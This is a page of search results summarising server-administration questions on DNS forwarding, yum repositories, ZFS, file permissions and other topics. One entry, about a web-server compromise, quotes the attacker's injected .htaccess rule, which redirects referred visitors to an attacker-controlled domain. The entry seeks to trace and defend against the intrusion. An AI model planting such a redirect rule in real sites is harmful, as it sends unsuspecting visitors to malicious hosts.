Search Results

Search found 24334 results on 974 pages for 'directory loop'.


  • DNS caching server config problem

    - by Alex
    I have a Bind DNS caching-only server setup that is working. I am bringing up a new AD domain controller that will also be a DNS server for that AD, but I don't want it responding to any DNS queries except those that are AD related. So, my goal is to leave this caching server as the primary DNS server for stations on the network and have it forward requests for the AD domain to the domain controller. My understanding is that I just need a forward zone for that domain pointing to the domain controller. However, it does not seem to be working, which leaves me to think that my caching server is not forwarding properly.

    For example, this AD is going to have a naming convention of hostname.mydomain.local. If I do an nslookup and specify the domain controller's IP address as the server, I can query addresses that exist in DNS on that server, such as dc1.mydomain.local. However, queries to my caching server time out (I get a response from the caching server if I query mydomain.local, but none of the objects in that domain). Any suggestions?

    Here is my named.conf file:

        options {
            directory "/var/named";
            listen-on { 192.168.0.14; 127.0.0.1; };
            forwarders { ; ; };
            forward first;
        };
        zone "." in {
            type hint;
            file "db.cache";
        };
        zone "0.0.127.in-addr.arpa" in {
            type master;
            file "db.127.0.0";
        };
        // forward zone for mydomain.local
        zone "mydomain.local" {
            type forward;
            forwarders { 192.168.1.21; };
        };
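
    A quick way to confirm whether the caching server is actually forwarding (a diagnostic sketch; the IP addresses are the ones from the question) is to query both servers for the same record and to flush the cache after each config change:

        # Query the domain controller directly (expected to succeed)
        dig @192.168.1.21 dc1.mydomain.local A +short

        # Query the caching server for the same name (should match if forwarding works)
        dig @192.168.0.14 dc1.mydomain.local A +short

        # After editing named.conf, reload and clear any negatively cached answers (if rndc is set up)
        rndc reload
        rndc flush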


  • How do I get yum to see updates to a local repo without cleaning cache?

    - by Matt
    I have set up a local yum repository which I use to install test builds. For testing purposes, my packages are versioned by <svn version number>.<date>.<time> (e.g. 12345.20110908.150404). The trouble is, once I make a new RPM, copy it to the repository directory, and run createrepo $REPO_DIR, yum does not see the new RPM as being available.

        $ cd $REPO_DIR
        $ ls -1
        repodata
        package-12345.20110908.150404-1.x86_64.rpm
        package-12345.20110908.174329-1.x86_64.rpm
        $ createrepo .
        # ...snip...
        $ rpm -q package
        package-12345.20110908.150404-1.x86_64
        $ yum list --showduplicates package
        Installed Packages
        package.x86_64    12345.20110908.150404-1    @repo
        Available Packages
        package.x86_64    12345.20110908.150404-1    repo

    I can see the updates and grab them if I run yum clean all and then re-fetch the metadata, but I think this just means I need to be doing something else on the repo side, as I don't have to do that for other yum repos. How do I need to set up my local repository so that I only need to run yum update from the client, without having to clean my yum cache?
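
    A common approach (a sketch; the .repo file name below is a placeholder for however the local repository is defined on the client) is to make yum treat this one repository's metadata as always stale, or at least to expire only the cached metadata instead of wiping everything:

        # In the client's repo definition (e.g. /etc/yum.repos.d/local-test.repo, placeholder name),
        # add this line so yum re-reads the repodata on every operation:
        #   metadata_expire=0

        # Alternatively, without touching the repo file, expire just the cached metadata
        # (much cheaper than 'yum clean all') before querying:
        yum clean expire-cache
        yum list --showduplicates package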


  • How would I write a terminal command to download a folder with wget from a Media Temple (gs) server?

    - by racl101
    I'm trying to download a folder using wget on the Terminal (I'm using a Mac, if that matters) because my ftp client sucks and keeps timing out. It doesn't stay connected for long. So I was wondering if I could use wget to connect via the ftp protocol to the server to download the directory in question. I have searched around on the internet for this and have attempted to write the command, but it keeps failing.

    So, assuming the following:

        ftp username is: [email protected]
        ftp host is: ftp.s12345.gridserver.com
        ftp password is: somepassword

    I have tried to write the command in the following ways:

        wget -r ftp://[email protected]:[email protected]/path/to/desired/folder/
        wget -r ftp://serveradmin:[email protected]/path/to/desired/folder/

    When I try the first way I get this error:

        Bad port number.

    When I try the second way I get a little further, but then I get this error:

        Resolving s12345.gridserver.com... 71.46.226.79
        Connecting to s12345.gridserver.com|71.46.226.79|:21... connected.
        Logging in as serveradmin ... Login incorrect.

    What could I be doing wrong?
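
    One thing worth trying (a sketch; the username and password below are placeholders, since Media Temple (gs) FTP usernames contain an '@'): keep the '@'-bearing username out of the URL, either by passing the credentials as options or by percent-encoding the '@' as %40, so wget's URL parser doesn't misread everything after it as a host and port:

        # Option 1: pass credentials via options instead of embedding them in the URL
        wget -r --ftp-user='user@example.com' --ftp-password='somepassword' \
             'ftp://ftp.s12345.gridserver.com/path/to/desired/folder/'

        # Option 2: keep the URL form, but encode the '@' inside the username as %40
        wget -r 'ftp://user%40example.com:somepassword@ftp.s12345.gridserver.com/path/to/desired/folder/'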


  • Cannot destroy ZFS snapshot: dataset already exists

    - by Morven
    I have a server (T5220, though I doubt it matters) running Solaris 10 8/07, and I have a ZFS pool, "mysql", on internal disk. Within it I have a filesystem "mysql/data/4.1.12", which I snapshot hourly with a script from cron. I have one snapshot, created as one of those hourly snaps, that will not destroy. I have renamed it out of sequence to be "mysql/data/4.1.12@wibble" so that my script will not try and fail to destroy it, but it was originally within the sequence, though I doubt that matters. It renames successfully. The snapshot can be successfully navigated and read from through the .zfs/snapshot directory. It has no clones based on it.

    Trying to destroy it does this:

        (265) root@web-mysql4:/# zfs destroy mysql/data/4.1.12@wibble
        cannot destroy 'mysql/data/4.1.12@wibble': dataset already exists
        (266) root@web-mysql4:/#

    which is apparently nonsensical: of course it already exists, that's the point! Has anyone seen anything like this before? Web searches show nothing obviously similar. I can provide the list of installed patches if necessary.
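
    A diagnostic sketch that may help narrow it down (hedged: the 'holds' subcommand only exists in later ZFS releases, so it may not be available on a 2007-era Solaris 10 build): the "dataset already exists" message often points at a leftover clone or hold tied to the snapshot, so it is worth enumerating both explicitly:

        # List the filesystem's snapshots
        zfs list -r -t snapshot mysql/data/4.1.12

        # Look for clones: any dataset in the pool whose origin is the stuck snapshot
        zfs get -r -o name,value origin mysql | grep '4.1.12@wibble'

        # If this ZFS release supports user holds, check for and release them
        zfs holds mysql/data/4.1.12@wibble
        # zfs release <tag> mysql/data/4.1.12@wibble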


  • How can I have vhosts with Lighttpd on Windows and keep PHP working through mod_cgi?

    - by Pixelastic
    Hello, I installed Lighty on Windows 7 and managed to get it to correctly serve both static and PHP files (through mod_cgi). At first I got the "No input file selected" message displayed when requesting a .php file. So I updated the doc_root value in my php.ini to match the server.document-root defined in my Lighty config, and PHP stopped complaining.

    Then I defined a vhost to point all foo.com requests to a specific dir. It worked well for all static files, but when requesting a .php file, mod_cgi was still picking files from the doc_root defined in php.ini, not from the directory I defined for server.document-root in my vhost. I know that's what's supposed to happen: PHP follows the config defined in php.ini. And I have to set this value in my php.ini, otherwise no PHP is processed at all.

    What I don't understand is how I'm supposed to have virtual hosts with mod_cgi enabled here. I tried adding a [HOST=foo.com] section in the php.ini without any luck. I tried mod_fastcgi but couldn't get it to work at all, and I also tried mod_simple_host but couldn't get it to handle PHP. I managed to get it working by copying my PHP install to another dir (and changing the doc_root value) and adding a cgi.assign pointing to that install in my vhost. But this is a really hackish way; it means having one PHP install for each virtual host.

    Note that I'm working on a development machine running Windows; this is not a production server. I just wanted to emulate the final server config locally to test some changes. I googled this problem a lot, but all I can find are people installing Lighty on Windows with mod_cgi, or installing Lighty on Windows with virtual hosts. I never found anyone who managed to get both.


  • Input/output error reading USB backup drive on CentOS 6.4

    - by Kev
    I'm suddenly seeing some strange behaviour on our USB backup drive that doesn't make sense to me:

        (2013-10-21 14:58:23 [root@newdc /]$ cd /mnt/backup/
        (2013-10-21 14:59:03 [root@newdc backup]$ ls -la
        ls: reading directory .: Input/output error
        total 0
        (2013-10-21 14:59:05 [root@newdc backup]$ df -h /mnt/backup
        Filesystem            Size  Used Avail Use% Mounted on
        /dev/sda1             917G  843G   28G  97% /mnt/backup

    How is it possible for the OS to know how much is in use, but I can't ls any of it as root? Or more to the point, what problem does this indicate? /var/log/messages said this:

        Oct 21 14:57:54 g5 kernel: EXT4-fs error (device sda1): ext4_journal_start_sb: Detected aborted journal
        Oct 21 14:57:54 g5 kernel: EXT4-fs (sda1): Remounting filesystem read-only

    But... read-only is something different from 'throw an I/O error'... After unmounting to try fsck on it, I had someone on-site look at it, and the drive was not spun up and had a slow-flashing light, which I believe means it was in a power-suspend mode. So I had them unplug and replug the USB cable, and now (before remounting) it says:

        fsck from util-linux-ng 2.17.2
        e2fsck 1.41.12 (17-May-2010)
        /dev/sda1: clean, 2805106/61046784 files, 181934167/244182016 blocks

    I then mount it, and now ls works and df reports:

        Filesystem            Size  Used Avail Use% Mounted on
        /dev/sda1             917G  680G  191G  79% /mnt/backup

    What would cause it to go into such a state without being asked to? Why all the weird behaviour, and why does it now appear not to be corrupt?


  • Changing the View of a Folder When It Is Opened from Finder

    - by user60044
    When I was running OS 10.4 I had all my folders beautifully organized, with their positions set and with each one remembering which view mode (icon, list, etc.) it should open in. When I transitioned to 10.6 I found that the OS ignored all that information, and it imposes the awful behaviour of changing the view for some folder and then having that view propagate up to all parent folders which don't have their views locked.

    The only way I can think of to get this functionality back is to write a program that, given a root directory, will enumerate it, setting the views based upon a static template I have. The other way I thought I could accomplish this is by Folder Actions. Aside from the fact that I don't know AppleScript, it seems folder actions cannot be inherited. Since I have thousands of folders involved here, all inheriting from a single root, I could not possibly manually add that action to each of those folders.

    What I would like to have is a folder action such that whenever I open a folder from Finder, if it contains any JPG, GIF, etc. type image files, it automatically opens that folder with an icon view at a reasonable size to suit the number of images. If the folder contains only folders, then it opens that folder in list view. Does anyone have anything that could do this for me? Thank You, -- Mark


  • File permissions on web server

    - by plua
    I have just read this useful article on file permissions, and I am about to implement an as-strict-as-possible file permissions policy on our webserver.

    Our situation: we have a web server accessed through sftp by different users from within our company, and we have the general public accessing Apache - sometimes uploading files through PHP. I distinguish folders and files by their use. So, based on this reading, here is my plan.

    All people who need to upload files will have separate users. But all of those users will belong to two groups: uploaders, and webserver. Apache will belong to the group webserver.

    Directories:
        Permission: 771
        Owner: user:uploaders
        Explanation: to access files in the folder, everybody needs to have execute permission. Only uploaders will be adding/removing files, so they also get r+w permission.

    Files within the web-root:
        Permission: 664
        Owner: user:uploaders
        Explanation: they will be uploaded and changed by different users, so both owner and group need to have w+r permissions. The webserver needs only to read files, so r permission only.

    Upload directories:
        Permission: 771
        Owner: user:webserver
        Explanation: when files need to be uploaded, Apache needs to be able to write to this directory. But I figure it is safer to change the group to webserver, thus giving Apache sufficient privileges (and all uploaders also belong to this group and will have the same permissions), while safeguarding against "others" writing to this folder.

    Uploaded files:
        Permission: 664
        Owner: user:webserver
        Explanation: after uploading, Apache might need to delete files, but this is no problem because it has w+r permission on the folder. So there is no need to make this file any more accessible than r access for the group.

    Not being an expert on file permissions, my question is whether or not this is the best possible policy for our situation. Any suggestions welcome.
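
    For reference, a sketch of how that plan could be applied with standard tools (the account name "alice" and the site path are illustrative; "www-data" is assumed to be the Apache user):

        # Groups and membership (illustrative account names)
        groupadd uploaders
        groupadd webserver
        usermod -aG uploaders,webserver alice
        usermod -aG webserver www-data

        # Web root: owned by an uploader account, group uploaders
        chown -R alice:uploaders /var/www/site
        find /var/www/site -type d -exec chmod 771 {} +
        find /var/www/site -type f -exec chmod 664 {} +

        # Upload directory: group webserver so Apache can write into it
        chown alice:webserver /var/www/site/uploads
        chmod 771 /var/www/site/uploads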


  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this:

        RewriteEngine On
        RewriteCond %{HTTP_REFERER} ^http://
        RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
        RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

    Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and I am looking for somebody who has already dealt with this and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing and have gotten further than I have in pinpointing the hole?

    So far we have determined:

        - the changes were made as www-data, so apache or its plugins are likely the culprit
        - all the changes were made within 15 minutes of each other, so it was probably automated
        - since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site)
        - if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse)

    Any more hints would be appreciated.
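
    A forensic sketch along those lines (paths, log locations, and the timestamp window are placeholders; adjust them to the actual incident time): list every injected .htaccess, pin down the modification window, then correlate it against POST requests in the access logs:

        # Find every .htaccess carrying the injected redirect and record its mtime
        grep -rl --include='.htaccess' '84f6a4eef61784b33e4acbd32c8fdd72' /var/www \
            | xargs -r ls -l --time-style=full-iso

        # Narrow to .htaccess files changed inside the 15-minute window (placeholder timestamps)
        find /var/www -name '.htaccess' -newermt '2012-06-01 09:00' ! -newermt '2012-06-01 09:15'

        # Look for POST requests hitting PHP scripts during that window (a common sign of an upload/RCE hole)
        grep ' "POST ' /var/log/apache2/*access*.log | grep '\.php'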


  • Copied a file with winscp; only winscp can see it

    - by nilbus
    I recently copied a 25.5 GB file from another machine using WinSCP. I copied it to C:\beth.tar.gz, and WinSCP can still see the file. However, no other app (including Explorer) can see the file. What might cause this, and how can I fix it?

    The details that might or might not matter:

        - WinSCP shows the size of the file (C:\beth.tar.gz) correctly as 27,460,124,080 bytes, which matches the filesize on the remote host
        - Neither Explorer, cmd (command line prompt with dir C:\), the 7-Zip archive program, nor any other File Open dialog can see the beth.tar.gz file under C:\
        - I have configured Explorer to show hidden files
        - I can move the file to other directories using WinSCP
        - If I try to move the file to Users\, UAC prompts me for administrative rights, which I grant, and I get this error: "Could not find this item. The item is no longer located in C:\"
        - When I try to transfer the file back to the remote host in a new directory, the transfer starts successfully and transfers data
        - The transfer had about 30 minutes remaining when I left it for the night
        - The morning after the file transfer, I was greeted with a message saying that the connection to the server had been lost. I don't think this is relevant, since I did not tell it to disconnect after the file was done transferring, and it likely disconnected after the file transfer finished.
        - I'm using an old version of WinSCP - v4.1.8 from 2008
        - I can view the file properties in WinSCP:
            Type of file: 7zip (.gz)
            Location: C:\
            Attributes: none (Read-only, Hidden, Archive, or Ready for indexing)
            Security: SYSTEM, my user, and the Administrators group have full permissions - everything other than "special permissions" is checked under Allow for all 3 users/groups (my user, Administrators, SYSTEM)

    What's going on?!


  • InstallShield or Windows installer corrupted

    - by Bobby S
    Just recently I've been unable to install any software on my Windows 7 machine. Anything that uses InstallShield or the Windows Installer will just hang or give a weird error. I noticed there will be many duplicate isbew64.exe processes (like 25) that launch and then just sit there, or else a lot of msiexec.exe *32 processes, depending on what I'm trying to install.

    One piece of software specifically is the Logitech Harmony software. It gives me an *is_string_not_defined* error, saying:

        c:\program files (x86)\:\
        The filename, directory name, or volume label syntax is incorrect.

    The other thing I was trying to install was Battlefield: Bad Company 2, and that just hangs as well, and then leaves all the Windows Installer processes running in the background after I quit the install process. Very odd.

    I've checked well and googled these issues; it doesn't appear to be any sort of malware issue. I feel like it's related to some kind of corrupted installer application. I've rebooted and deleted the InstallShield folder in Program Files\Common Files as some places online suggested, but to no avail. I have no idea what to do - any ideas?


  • Join Domain from VM

    - by Adis
    I have two VMs running on VMware Player. I use NAT adapter settings. The host machine for the VMs is running on the corporate network. The first VM has a domain controller running, and I can log in on that machine using domain credentials. I named the domain wm.local. When I run ipconfig on this machine:

        IP: 192.168.87.132
        Default Gateway: 192.168.87.2
        DNS server: 192.168.87.2
        DHCP server: 192.168.87.254

    The second VM cannot join the domain. When I try it with domain WM, I'm prompted for credentials. I enter the Administrator credentials, it waits for some time, and I get the response: "The specified domain either does not exist or could not be contacted." If I type wm.local as the domain when trying to join, it does not prompt me to log in but just shows "An Active Directory Domain Controller (AD DC) for the domain wm.local could not be contacted." And here it takes no time to get this error message. ipconfig on this machine:

        IP: 192.168.87.134
        Default Gateway: 192.168.87.2
        DNS server: 192.168.87.2
        DHCP server: 192.168.87.254

    I can ping the second VM from the first one, and I have disabled the firewalls on both machines. Any ideas? Is there a manual for this?


  • DFS Root namespace is RDWR for all users

    - by Patrick
    We have an existing DFS Replication and Namespace group that we use to serve the company's files. This has been operating fine for us for some time now, and continues to do so. However, a situation arose yesterday afternoon that has left us stumped.

    We have our namespace presented as:

        \\domain.co.uk\public\[8 or 9 folders that are mapped to the users in the business]

    We had a problem this morning that meant that a number of users started mapping their AD home drive directly to the \\domain.co.uk\public directory, and we found that they had read/write access. This rapidly became a problem, as at least one director saved some moderately sensitive documents in there and basically anyone could read them. I've tidied up that specific problem with some deft scripting and a slight modification of group policy.

    However, I would like to make \public read-only. The trouble is I can't work out where the ACLs for that folder would be held. All the folders that are presented as \\domain.co.uk\public\[folder] are 'real' folders on logical volumes on our DFS servers, so they are secured with groups that are applied via the 'security' tab. I'd like to do the same on \public, but I can't find it. I have looked through, amongst other things, \Sysvol\domain.co.uk but can't find it, and after a lot of clicking and a bit of reading I can't see how to lock it down. Any thoughts?


  • Nexenta, NFS and LOCK_EX

    - by Givre
    I'm currently using a LAMP architecture and I'm facing a big problem :( I have several HTTP web servers using PHP5. All of them mount, via NFS (v3), the directory holding all the hosted websites. The file server is running the Nexenta Storage Appliance using ZFS.

    The problem is that every NFS client trying to write to a file over NFS hits this (seen inside the apache2 process):

        open("/nfs/website1/file.txt", O_RDWR|O_CREAT, 0600) = 11647
        fstat(11647, {st_mode=S_IFREG|0600, st_size=23754, ...}) = 0
        flock(11647, LOCK_EX

    and the process never gets the lock and keeps waiting for it... forever. The effect? All the apache2 processes get used up waiting... my servers can't process any other requests because there are no more processes available.

    I don't know where to find a solution. To me it looks like it's on the NFS server side, but which configuration is wrong or missing? How can I find what is wrong? If you need more information about the configuration, just ask me what would help you most :)
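
    A quick check worth running from one of the web servers (a diagnostic sketch; "nexenta-filer" is a placeholder for the real appliance hostname): flock() over NFSv3 is serviced by the NLM side-band protocol, so both the client and the server need the lock manager and status services registered with the portmapper:

        # On the NFS client (web server): is the lock manager registered locally?
        rpcinfo -p localhost | egrep 'nlockmgr|status'

        # Against the file server (placeholder hostname): the same services must answer there
        rpcinfo -p nexenta-filer | egrep 'nlockmgr|status'

        # Confirm how the share is actually mounted (check the NFS version and any 'nolock' option)
        grep ' nfs ' /proc/mounts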


  • Getting the EFS Private Key out of system image

    - by thaimin
    I had to recently re-install Windows 7 and I lost my exported private key for EFS. However, I have the entirety of my old user directory, and I figure the key must be in there SOMEWHERE. The only question is how to get it out.

    I did find the public keys in AppData\Roaming\Microsoft\SystemCertificates\My\Certificates. If I import them using certmgr.msc, the certificate information says I do have the private key, but if I try to export them it says I do not have the private key. Also, decryption of files doesn't work. There is also a "Keys" folder at AppData\Roaming\Microsoft\SystemCertificates\My\Keys. After importing the certificates I copied those over into my new installation, but it had no effect.

    I am starting to believe the private keys are either in AppData\Roaming\Microsoft\Protect\S-1-5-21-...\ or AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-...\, but I am unsure how to use the files in those folders. Also, since my SID has changed, will I be able to use them? The other parts of the account have remained the same (name and password). I also have complete access to the user registry hive and most of the old system files (including the old system registry hives). I keep seeing references to a "Key Recovery Agent" but have not found anything about using one, just that it can be used. Thanks!


  • Unix sort 10x slower with keys specified

    - by KenFar
    My data: it's a 71 MB file with 1.5 million rows. It has 6 fields, four of which are strings of avg. 15 characters; two are integers. Three of the fields are sometimes empty. All six fields combine to form a unique key - and that's what I need to sort on.

    Sort statement:

        sort -t ',' -k1,1 -k2,2 -k3,3 -k4,4 -k5,5 -k6,6 -o a_out.csv a_in.csv

    The problem: if I sort without keys, it takes 30 seconds. If I sort with keys, it takes 660 seconds. I need to sort with keys to keep this generic and useful for other files that have non-key fields as well. The 30-second timing is fine, but the 660 is a killer.

    I could theoretically move the temp directory to SSD, and/or split the file into 4 parts, sort them separately (in parallel), then merge the results, etc. But I'm hoping for something simpler, since these results are so bad as-is. Any suggestions?
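
    Two things commonly recover most of that gap (a sketch; -S and --parallel exist only in newer GNU coreutils versions, so treat those as optional): forcing byte-wise collation with LC_ALL=C, which makes keyed comparisons far cheaper than locale-aware ones, and giving sort a larger in-memory buffer:

        # Byte-wise collation: usually the single biggest win for keyed sorts
        LC_ALL=C sort -t ',' -k1,1 -k2,2 -k3,3 -k4,4 -k5,5 -k6,6 -o a_out.csv a_in.csv

        # Newer GNU sort can also use a bigger buffer and several cores
        LC_ALL=C sort -S 512M --parallel=4 -t ',' -k1,1 -k2,2 -k3,3 -k4,4 -k5,5 -k6,6 \
            -o a_out.csv a_in.csv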


  • Symlink path can be followed manually, but `cd` returns Permission denied

    - by Ricket
    I am trying to access the directory /usr/software/test/agnostic. There are several symlinks involved in this path. As you can see from the transcript below, I am unable to cd directly to the path, but I can check each step of the way and cd to the symlinked directories until I reach the destination. Why is this? (And how do I fix it?) This is Ubuntu 12.10, with bash.

        > ls /usr/software/test/agnostic
        ls: cannot access /usr/software/test/agnostic: Permission denied
        > cd /usr/software/test
        > cd agnostic
        bash: cd: agnostic: Permission denied
        > pwd -P
        /x/eng/localtest/arch/x86_64-redhat-rhel5
        > ls -al | grep agnostic
        lrwxrwxrwx 1 root root 15 Oct 23  2007 agnostic -> noarch/agnostic
        > ls -al | grep noarch
        ...
        lrwxrwxrwx 1 root root 23 Oct 23  2007 noarch -> /x/eng/localtest/noarch
        > cd noarch
        > cd agnostic
        bash: cd: agnostic: Permission denied
        > ls -al | grep agnostic
        lrwxrwxrwx 1 5808 dip 4 Oct  5  2010 agnostic -> main
        > cd main
        > ls
        (correct output of `ls`)
        > pwd
        /usr/software/test/noarch/main
        > pwd -P
        /x/eng/localtest/noarch/main
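
    One way to see exactly which component in the chain is denying access (a sketch; namei ships with util-linux on Ubuntu) is to have namei print the owner, group, and mode of every path element, expanding symlinks as it goes:

        # Show ownership and permissions for each component of the path, following symlinks
        namei -l /usr/software/test/agnostic

        # For comparison, the fully resolved physical path
        readlink -f /usr/software/test/agnostic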


  • Quick introduction to Linux needed

    - by 0xDEAD BEEF
    Hi guys! I have to get into Linux ASAP, and I really mean ASAP. I have installed Cygwin, but as always, things don't go as easily as one would like. The first problem I encountered was: I chose the KDE package, but there is no sign of KDE files anywhere in the cygwin folder. How do I run KDE windows? Currently startx fires up, but everything looks ugly!

    My desire is to download and run Qt Creator. It seems that there is no cygwin package, but downloading the source and compiling is good to go. Only I have forgotten every Linux command I ever knew! :D

    Please - what are the default commands you use on Linux? What does exec do? What does ./ stand for? What is the directory structure, and why is there such a mess in the bin folder?

    Thank god I have Windows over cygwin, so downloading files is not a problem, but again - how do I unpack them in Linux style, and how do I build? Do I simply issue a "make" command from the folder where I extracted the files? Please help!
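
    For the unpack-and-build part specifically, the classic source-tarball workflow looks like this (a sketch; the archive name is a placeholder, and many projects - Qt Creator included - may use their own build steps such as qmake, so check the project's README first):

        # Unpack a .tar.gz source archive into the current directory
        tar xzf some-project-1.0.tar.gz
        cd some-project-1.0

        # Typical autotools-style build; './' simply means "run the script found in this directory"
        ./configure
        make
        make install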


  • Windows Server 2008 R2 creating a multi-year client certificate using the IIS certsrv page while deploying SSTP VPN

    - by Warren P
    I am trying to follow instructions on Technet about deploying a Standard (non-enterprise) SSTP-based VPN that were originally written for Server 2008, but I am using Server 2008 R2. I have gotten as far as the part where it asks you to request a Server Authentication certificate. I have deployed IIS and Active Directory Certificate Services, and chose a "Standalone", "Standard" (non-enterprise) Certificate Authority because I don't have an OID and don't think I should have to get one for a simple deployment of SSTP.

    The certificates produced by the Certification Authority's "Issue" command only have a one-year period of validity, and I want a multi-year certificate. At no point in this process is there any way to input this information, unless it's through the Attributes text input area on the Advanced Certificate Request page, which appears to be generated using an old ActiveX control. That means I can only do this using the workarounds in the article that I linked at the top, and only using Internet Explorer.

    Update: It may be that this question is pointless, since self-signed keys do not appear to work when I try them using Windows 8 as the VPN client. The problem is that the keys created by the technique shown here do not have any certificate revocation (CRL) URLs, so I get the error "The revocation function was unable to check revocation", and the VPN connection fails.


  • Group Policy - Published software not upgrading

    - by VokinLoksar
    I'm testing this with mercurial MSIs, but it's the same for other packages. I've created a new group policy and added an old version of mercurial to User software installation as a Published package. On a Windows 7 client I install the package through Programs and Features. The installation works fine.

    Now, I would like to publish an updated version of mercurial. I create a new Published package. Under 'Upgrades' I configure it to replace (upgrade also doesn't work) the old version and mark this upgrade as 'Required'. The old package is not removed. The Windows 7 client is then restarted. When I log back in, I see a status message saying something like 'Removing managed software Mercurial ...'. There is no message about installation of the upgrade.

    If I look in Programs and Features, I can see the new version of mercurial listed. However, the actual mercurial directory under Program Files is missing. It's as though the installation recorded information about the MSI, but didn't actually install anything after removing the old version.

    As I mentioned, this isn't specific to mercurial. I've tried using other apps and have yet to find one that can be upgraded via a Published package. Using Assigned packages in Computer Configuration works without problems, but I would like this software to be optional rather than required. Ideas?


  • How to copy a floppy boot disk?

    - by Sammy
    I have a floppy boot disk and I would like to copy it to preserve it, as a backup. If I have two floppy drives, A and B, how can I copy the disk?

    Assuming one has two floppy drives: can I simply insert the floppy disk in one of the drives and then an empty floppy disk in the other and issue a simple command like this one?

        A:\>copy . b:

    Will this only copy the contents of the current directory and none of the files in subdirectories? Do I have to explicitly specify the option to copy everything? Also, what about the boot information? That won't get copied, right?

    If one has only one floppy drive: how do you copy a floppy disk if you only have one floppy drive? Do you in fact have to copy its contents to the local hard drive C and then copy that to an empty floppy disk using the same floppy drive?

        A:\>copy . c:\floppydisk
        A:\>
        A:\>c:
        C:\>
        C:\>copy floppydisk a:
        C:\>

    I'm guessing I will need some type of disk image tool to really copy everything on a bootable floppy disk. Something like the dd command on Linux perhaps? Am I right?
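
    Since the question already points at dd: on a Linux machine, a sector-level image captures the boot sector as well as the files (a sketch, assuming the drive shows up as /dev/fd0; on DOS/Windows the equivalent sector-level tool would be DISKCOPY):

        # Read the whole floppy, boot sector included, into an image file
        dd if=/dev/fd0 of=boot-floppy.img bs=512 conv=noerror,sync

        # Later, write the image back onto a blank floppy
        dd if=boot-floppy.img of=/dev/fd0 bs=512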


  • Setting up a test and live environment - how?

    - by Sean
    I am a bit new to servers and stuff, so I had a question. I have my development team working on my website. They are in different countries, and currently they put all the work live on the test site. But the test site is open to anyone who knows the URL. It is behind a directory, but this affects my QA process because I cannot use the accurate URL structures to prevent the general public from seeing it.

    So what I want to do is: have my site live on the net but only for me and my team, so like an internal network. Also, I will need to mirror this to my live site when I put it live. So I guess this is something like setting up a staging and live environment.

    So how do I do it, and are both environments on the same physical server or do I need to buy two servers? And if I set up a staging environment, how will I and my team access it, since we are all spread out? I assume we need to log into something to access it. What about the URL - do I need a different URL for the test site, or can I use the same live URL for the test site? I plan to get a dedicated server + CDN for my site.


  • auth user and exec a node app only with apache?

    - by Blame
    I couldn't find an answer on the web and I've been trying for days now, so I hope that someone with more experience with Apache can help me out.

    I am writing a web editor, and the user should be able to edit a file that is on the server, in a directory the user has access to. The problem I am facing is that I need to authenticate against the system users (shadow/passwd). So the user should be able to log in with a system account, and then the node app which does all the logic should be started with that user's rights. I hope to get this working without any additional script and only with Apache.

    I found out two things:

        - I can use mod_auth_pam to authenticate the user
        - There is a mod called suEXEC which can exec the node app with a specified user

    The problem is that I have to hard-code which user is used by suEXEC, but I want to decide that when the user logs in. Is there any way to authenticate a user against shadow/passwd and then exec a program with that user's rights? I don't want to run the node app as root, and the user should only be able to access his own files. Any help would be appreciated! Thanks, Kodak


  • What are the best linux permissions to use for my website?

    - by Nic
    This is a Canonical Question about File Permissions on a Linux web server.

    I have a Linux web server running Apache2 that hosts several websites. Each website has its own folder in /var/www/:

        /var/www/contoso.com/
        /var/www/contoso.net/
        /var/www/fabrikam.com/

    The base directory /var/www/ is owned by root:root. Apache is running as www-data:www-data. The Fabrikam website is maintained by two developers, Alice and Bob. Both Contoso websites are maintained by one developer, Eve. All websites allow users to upload images. If a website is compromised, the impact should be as limited as possible.

    I want to know the best way to set up permissions so that Apache can serve the content, the website is secure from attacks, and the developers can still make changes. One of the websites is structured like this:

        /var/www/fabrikam.com
            /cache
            /modules
            /styles
            /uploads
            /index.php

    How should the permissions be set on these directories and files? I read somewhere that you should never use 777 permissions on a website, but I don't understand what problems that could cause. During busy periods, the website automatically caches some pages and stores the results in the cache folder. All of the content submitted by website visitors is saved to the uploads folder.
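
    One widely used layout, expressed as commands (a sketch under the assumptions in the question; the group name is illustrative): give each site its own developer group, make directories setgid so new files inherit that group, and grant the Apache user write access only where the application genuinely needs it:

        # Per-site developer group (illustrative name)
        groupadd fabrikam-dev
        usermod -aG fabrikam-dev alice
        usermod -aG fabrikam-dev bob

        # Developers share write access through the group; Apache reads via 'other'
        chown -R alice:fabrikam-dev /var/www/fabrikam.com
        find /var/www/fabrikam.com -type d -exec chmod 2775 {} +   # setgid: new files keep the group
        find /var/www/fabrikam.com -type f -exec chmod 0664 {} +

        # Only cache/ and uploads/ are writable by the Apache user
        chown -R www-data:fabrikam-dev /var/www/fabrikam.com/cache /var/www/fabrikam.com/uploads
        chmod 2770 /var/www/fabrikam.com/cache /var/www/fabrikam.com/uploads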


  • Expire Files In A Folder: Delete Files After x Days

    - by Brett G
    I'm looking to make a "drop folder" on a Windows shared drive that is accessible to everyone. I'd like files to be deleted automagically if they sit in the folder for more than X days. However, it seems like all the methods I've found to do this use the last modified date, last access time, or creation date of a file.

    I'm trying to make this a folder that a user can drop files in to share with somebody. If someone copies or moves files into here, I'd like the clock to start ticking at that point. However, the last modified date and creation date of a file will not be updated unless someone actually modifies the file. The last access time is updated too frequently... it seems that just opening a directory in Windows Explorer will update the last access time.

    Anyone know of a solution to this? I'm thinking that cataloging the hashes of files on a daily basis and then expiring files based on hashes older than a certain date might be a solution... but taking hashes of files can be time consuming. Any ideas would be greatly appreciated!

    Note: I've already looked at quite a lot of answers on here... looked into File Server Resource Manager, PowerShell scripts, batch scripts, etc. They still use the last access time, last modified time, or creation time... which, as described, do not fit the above needs.

